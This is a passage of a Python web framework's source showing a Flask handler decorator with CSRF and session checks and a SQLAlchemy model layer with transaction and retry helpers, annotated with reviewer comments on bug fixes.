        json = _json
        if name.startswith('get_'):
            name = name[4:]
            method = 'GET'
        elif name.startswith('post_'):
            method = 'POST'
        elif name.startswith('rpc_'):
            method = 'POST'
            rpc = json = True
            stpl = None
        else:
            raise Exception('All handlers must be marked get_, post_, or rpc_.')

        module = func.__module__.split('.')[-1]
        if module not in all:
            all[module] = DictObject()
            setattr(handler, module, all[module])
        args = func.__code__.co_varnames[:func.__code__.co_argcount]
        hasId = len(args) > 0 and args[0] == 'id' and not rpc

        def respond(id):
            """Do the per-request work and return the Flask response."""
            tpl = stpl
            if 'csrf' not in session:
                session['csrf'] = binascii.hexlify(os.urandom(16)).decode('ascii')
            if (not CSRFable and method == 'POST' and
                    request.form.get('csrf') != session['csrf']):
                abort(403)
            if session.get('userId'):
                session.user = User.one(id=int(session['userId']))
            else:
                session.user = None
            if admin and (session.user is None or not session.user.admin):
                return abort(404)
            elif authed and session.user is None:
                return _redirect(handler.auth.get_index.url(error=0))

            params = request.form if method == 'POST' else request.args
            kwargs = {}
            for i, arg in enumerate(args):
                if i == 0 and arg == 'id' and not rpc:
                    continue
                if arg in params:
                    kwargs[arg] = params[arg]
                elif arg in request.files:
                    kwargs[arg] = request.files[arg]
                elif rpc:
                    # RPC requires all arguments. This was an assert, which
                    # -O strips and which otherwise surfaced as a 500.
                    abort(400)

            positional = ()
            if hasId and id is not None:
                try:
                    positional = (int(id),)
                except ValueError:
                    abort(404)  # non-numeric id in the URL (was a 500)

            try:
                ret = ofunc(*positional, **kwargs)
            except RedirectException as r:
                return _redirect(r.url)
            except TemplateException as t:
                tpl = t.tpl
                ret = t.args

            if json:
                ret = dumps(ret)
            elif tpl is not None:
                # A handler may short-circuit with a plain string response.
                if isinstance(ret, (str, type(u''))):
                    return ret
                context = kwargs
                context['handler'] = handler
                context['request'] = request
                context['session'] = session
                context['len'] = len
                context['int'] = int
                context['float'] = float
                context.update(ret if ret is not None else {})
                ret = render_template(tpl + '.html', **context)
                # Templates mark form positions with $CSRF$. The field markup
                # had been reduced to ' ' % token, which raised TypeError on
                # every render.
                # NOTE(review): the markup is reconstructed -- confirm it
                # matches the forms. The token is hex, so it is
                # attribute-safe.
                csrf = '<input type="hidden" name="csrf" value="%s">' % session['csrf']
                ret = ret.replace('$CSRF$', csrf)

            response = make_response(ret, 200)
            if json:
                response.mimetype = 'application/json'
            if hasattr(request, '_headers'):
                for k, v in request._headers.items():
                    response.headers[k] = v
            response.headers['X-Frame-Options'] = 'sameorigin'
            return response

        def func(id=None):
            createLocalSession()
            failed = True
            try:
                response = respond(id)
                failed = False
            finally:
                # Also runs for early returns (redirects, plain strings),
                # which the old try/else skipped.
                closeLocalSession(failed)
            return response

        # Flask derives the endpoint name from __name__, so make it unique
        # per module and handler.
        func.__name__ = '__%s__%s__' % (module, name)

        def url(_id=None, **kwargs):
            if module == 'index':
                path = '/'
                trailing = True
            else:
                path = '/%s' % module
                trailing = False
            if name != 'index':
                if not trailing:
                    path += '/'
                path += '%s' % name
                trailing = False
            if _id is not None:
                if not trailing:
                    path += '/'
                path += quote(str(_id))
            if kwargs:
                path += '?' + urlencode(dict((k, str(v)) for k, v in kwargs.items()))
            return path

        ustr = StrObject(url())
        ustr.__call__ = ofunc
        ustr.url = url
        func.url = url
        if name not in all[module]:
            all[module][name] = method, args, rpc, [None, None]
        all[module][name][3][1 if hasId else 0] = func
        setattr(all[module], sofunc.__name__, ustr)
        return ustr

    # Bare @handler usage: the decorated function arrives as _tpl.
    if _tpl is not None and hasattr(_tpl, '__call__'):
        func = _tpl
        _tpl = None
        return sub(func)
    return sub
162 |
def sessid():
    """Return this browser session's random id, creating it on first use.

    The id is 8 bytes from os.urandom written as 16 lowercase hex digits,
    and it is kept in the Flask session under 'sessid'.
    """
    if 'sessid' not in session:
        session['sessid'] = ''.join('{:02x}'.format(byte) for byte in bytearray(os.urandom(8)))
    return session['sessid']
handler.sessid = sessid
169 |
def header(key, value):
    """Queue a response header for the current request.

    Headers are collected in ``request._headers``. The handler view copies
    them onto its response.
    """
    try:
        pending = request._headers
    except AttributeError:
        pending = request._headers = {}
    pending[key] = value
handler.header = header
176 |
class RedirectException(Exception):
    """Raised by redirect(); the handler view turns it into an HTTP redirect."""

    def __init__(self, url):
        self.url = url


def redirect(url, _id=None, **kwargs):
    """Abort the current handler with a redirect. Never returns.

    ``url`` is either a URL string or a handler object (callable, with a
    ``.url`` builder, as returned by @handler). For a handler object, the
    URL is built from ``_id`` and ``kwargs``.

    Raises:
        RedirectException: always.
    """
    import sys

    if hasattr(url, '__call__') and hasattr(url, 'url'):
        url = url.url(_id, **kwargs)
    # Same output as the old Python 2 `print` statement, but valid syntax on
    # both Python 2 and 3.
    sys.stdout.write('Redirecting to %s\n' % (url,))
    raise RedirectException(url)
186 |
class TemplateException(Exception):
    """Raised by templatize() so the handler renders template ``tpl`` with
    context ``args`` instead of its own template."""

    def __init__(self, tpl, args):
        Exception.__init__(self, tpl)
        self.tpl = tpl
        self.templateArgs = args

    # BaseException.args is a built-in slot whose setter coerces any value to
    # a tuple. The old ``self.args = args`` therefore turned the context dict
    # into a tuple of its keys, and the handler's ``update(t.args)`` then
    # failed. Keep exposing the dict under the same attribute name.
    @property
    def args(self):
        return self.templateArgs

    @args.setter
    def args(self, value):
        self.templateArgs = value


def templatize(tpl, **args):
    """Abort the current handler and render template ``tpl`` with ``args``."""
    raise TemplateException(tpl, args)
193 |
--------------------------------------------------------------------------------
/metamodel.py:
--------------------------------------------------------------------------------
1 | import sqlalchemy as sa
2 | from sqlalchemy import orm
3 | from sqlalchemy.types import Integer
4 | from sqlalchemy.sql.type_api import TypeEngine
5 | from sqlalchemy.orm import scoped_session, sessionmaker
6 | from sqlalchemy.orm.attributes import QueryableAttribute
7 | from flask import request
8 | import sys
9 |
class SessionProxy(object):
    """Stand-in for the current request's session (``request._session``).

    Unknown attributes are forwarded to that session, so ``transact.query``
    and ``transact.add`` reach it directly. Used as a context manager, it
    tracks nesting depth in ``request._inTransact``. Only the outermost
    ``with`` block commits (on success) or rolls back (on error).
    Exceptions are never suppressed.
    """

    def __getattr__(self, name):
        return getattr(request._session, name)

    def __enter__(self):
        request._inTransact = getattr(request, '_inTransact', 0) + 1

    def __exit__(self, type, value, traceback):
        request._inTransact -= 1
        if request._inTransact > 0:
            # Nested block: the outermost one decides commit vs rollback.
            return False
        if type is not None:
            request._session.rollback()
            return False
        try:
            request._session.commit()
        except:
            request._session.rollback()
            raise
        return False
34 |
def createLocalSession():
    """Attach a fresh scoped SQLAlchemy session, bound to ``engine``, to the
    current request as ``request._session``."""
    factory = sessionmaker(bind=engine)
    request._session = scoped_session(factory)
38 |
def closeLocalSession(didExcept):
    """Tear down the current request's session.

    If ``didExcept`` is true, the open transaction is rolled back first. This
    must happen *before* remove(). After remove(), touching
    ``request._session`` makes the scoped registry create a brand-new
    session, so the old order rolled back an empty session instead of the
    failed one. remove() runs even if the rollback fails.
    """
    scoped = request._session
    try:
        if didExcept and scoped.is_active:
            scoped.rollback()
    finally:
        scoped.remove()
43 |
# Shared handle used as `with transact:` and for transact.query/add; it
# forwards to the session stored on the current request.
transact = SessionProxy()
# Table registry; setup() adds one Table per model class to it.
metadata = sa.MetaData()
46 |
47 | # Monkey patched into Model-decorated classes
@classmethod
def relation(cls, *args, **kwargs):
    """Build an ORM relationship pointing at ``cls``.

    Example: ``Log.relation(backref='target')``. Extra arguments are
    forwarded unchanged.
    """
    return orm.relationship(cls, *args, **kwargs)
51 |
52 |
@classmethod
def create(cls, **kwargs):
    """Instantiate ``cls``, set each keyword as an attribute, add the object
    to the session and return it.

    Runs in a transact block, so it commits when this is the outermost one.
    """
    with transact:
        instance = cls()
        for attr in kwargs:
            setattr(instance, attr, kwargs[attr])
        transact.add(instance)
    return instance
61 |
62 |
def update(self, **kwargs):
    """Set each keyword argument as an attribute on ``self`` and return ``self``.

    Opens no transaction of its own.
    """
    for attr in kwargs:
        setattr(self, attr, kwargs[attr])
    return self
67 |
68 |
def _retrying(attempt, missing=(), attempts=10):
    """Run ``attempt()`` inside ``with transact:``, retrying on failure.

    Returns the first successful result. An exception listed in ``missing``
    means "no such row" and returns None at once instead of being retried.
    Any other Exception is retried, up to ``attempts`` tries in total; after
    that, None is returned, as before.
    """
    for _ in range(attempts):
        try:
            with transact:
                return attempt()
        except missing:
            return None
        except Exception:
            continue
    return None


@classmethod
def all(cls):
    """Return every ``cls`` row as a list (None if the query keeps failing)."""
    return _retrying(lambda: transact.query(cls).all())


def genFilter(cls, kwargs):
    """Build the AND of ``cls.<column> == value`` for each keyword."""
    clauses = [getattr(cls, k) == v for k, v in kwargs.items()]
    if len(clauses) == 1:
        return clauses[0]
    return sa.and_(*clauses)


@classmethod
def some(cls, **kwargs):
    """Return all ``cls`` rows matching ``kwargs`` (None if the query keeps failing)."""
    return _retrying(lambda: transact.query(cls).filter(genFilter(cls, kwargs)).all())


@classmethod
def one(cls, **kwargs):
    """Return the single ``cls`` row matching ``kwargs``, or None.

    No match, or more than one match, returns None immediately. Before,
    the NoResultFound raised by an ordinary miss was caught by the blanket
    retry loop, so every miss ran the query ten times before returning None.
    """
    from sqlalchemy.orm.exc import MultipleResultsFound, NoResultFound

    return _retrying(
        lambda: transact.query(cls).filter(genFilter(cls, kwargs)).one(),
        missing=(NoResultFound, MultipleResultsFound))
112 |
113 |
def Model(func):
    """Build a model class from the body of ``func``.

    ``func`` is called once while sys.settrace is active, so its frame can be
    captured. Every local variable it defines (every name in co_varnames)
    becomes a class attribute of a new class named after the function. The
    helper methods create/update/all/some/one/relation are attached, and the
    class is appended to Model.classes for setup() to map to tables later.
    """
    cframe = [None]  # a list so the nested trace function can store into it
    def trace(frame, event, arg):
        # The first traced event is the call into func(); remember that frame.
        # Returning None requests no line-level tracing inside it.
        if cframe[0] is None:
            cframe[0] = frame
    # NOTE(review): settrace(None) below also removes any tracer that was
    # already installed (debugger/coverage), and tracing is left on if func()
    # raises -- confirm that is acceptable.
    sys.settrace(trace)
    func()
    sys.settrace(None)

    frame = cframe[0]
    # func has returned, so this reads the finished frame's locals.
    # NOTE(review): relies on CPython keeping those locals readable.
    names = list(func.func_code.co_varnames)
    elems = {name : frame.f_locals[name] for name in names}

    cls = type(func.__name__, (object, ), elems)
    cls._fields = names  # setup() later prunes non-column names from this
    cls.create = create
    cls.update = update
    cls.all = all
    cls.some = some
    cls.one = one
    cls.relation = relation
    Model.classes.append(cls)
    return cls
Model.classes = []  # every class built by Model, in definition order
138 |
engine = None  # set by setup(); used by createLocalSession()


def setup(db):
    """Create the engine for ``db``, map every Model class to a table, and
    create any missing tables.

    Returns a decorator. The decorated function is called immediately, but
    only if none of the model tables existed before this call (first run).
    """
    global engine
    engine = sa.create_engine(db, client_encoding='utf8')
    metadata.bind = engine

    initialized = False  # becomes True if any model's table already existed

    for model in Model.classes:
        name = model.__name__
        # Order attribute names with PrimaryKey-wrapped fields first.
        params = []
        for field in dir(model):
            value = getattr(model, field)
            if isinstance(value, PrimaryKey):
                params = [field] + params
            else:
                params.append(field)

        # An integer 'id' primary key is always added.
        # NOTE(review): a model that also declares a PrimaryKey field would
        # end up with a composite key -- confirm that is intended.
        columns = []
        columns.append(sa.Column('id', Integer, primary_key=True))
        relations = {}
        for field in params:
            value = getattr(model, field)
            if isinstance(value, Modifier):
                # PrimaryKey/ForeignKey/Nullable/Unique wrappers build their column.
                columns.append(value.build(field))
                delattr(model, field)
            elif (isinstance(value, type) or isinstance(value, TypeEngine)) and field != '__class__':
                # Bare SQLAlchemy types (class or instance) become plain
                # columns; dir() includes '__class__', itself a type, so skip it.
                columns.append(sa.Column(field, value))
                delattr(model, field)
            elif isinstance(value, orm.properties.RelationshipProperty):
                relations[field] = value
                delattr(model, field)
            elif field in model._fields:
                # Non-column locals (methods etc.) are dropped from _fields.
                model._fields.remove(field)

        table = sa.Table(name, metadata, *columns)
        orm.mapper(model, table, properties=relations)
        if table.exists():
            initialized = True

    metadata.create_all()

    def sub(func):
        if not initialized:
            func()

    return sub
188 |
189 |
class Modifier(object):
    """Marker base for column wrappers used inside @Model bodies.

    setup() turns any Modifier-valued model attribute into a column by
    calling ``build(fieldName)``.
    """


class PrimaryKey(Modifier):
    """Column of ``type`` with ``primary_key=True``."""

    def __init__(self, type):
        self.type = type

    def build(self, name):
        return sa.Column(name, self.type, primary_key=True)


class ForeignKey(Modifier):
    """Column of ``type`` referencing ``ref`` (``'Table.column'``).

    Any extra positional or keyword arguments are forwarded to sa.Column.
    """

    def __init__(self, type, ref, *args, **kwargs):
        self.type = type
        self.ref = ref
        self.args = args
        self.kwargs = kwargs

    def build(self, name):
        reference = sa.ForeignKey(self.ref)
        return sa.Column(name, self.type, reference, *self.args, **self.kwargs)


class Nullable(Modifier):
    """Column of ``type`` with ``nullable=True``; extras go to sa.Column."""

    def __init__(self, type, *args, **kwargs):
        self.type = type
        self.args = args
        self.kwargs = kwargs

    def build(self, name):
        leading = (name, self.type) + tuple(self.args)
        return sa.Column(*leading, nullable=True, **self.kwargs)


class Unique(Modifier):
    """Column of ``type`` with ``unique=True``; extras go to sa.Column."""

    def __init__(self, type, *args, **kwargs):
        self.type = type
        self.args = args
        self.kwargs = kwargs

    def build(self, name):
        leading = (name, self.type) + tuple(self.args)
        return sa.Column(*leading, unique=True, **self.kwargs)
--------------------------------------------------------------------------------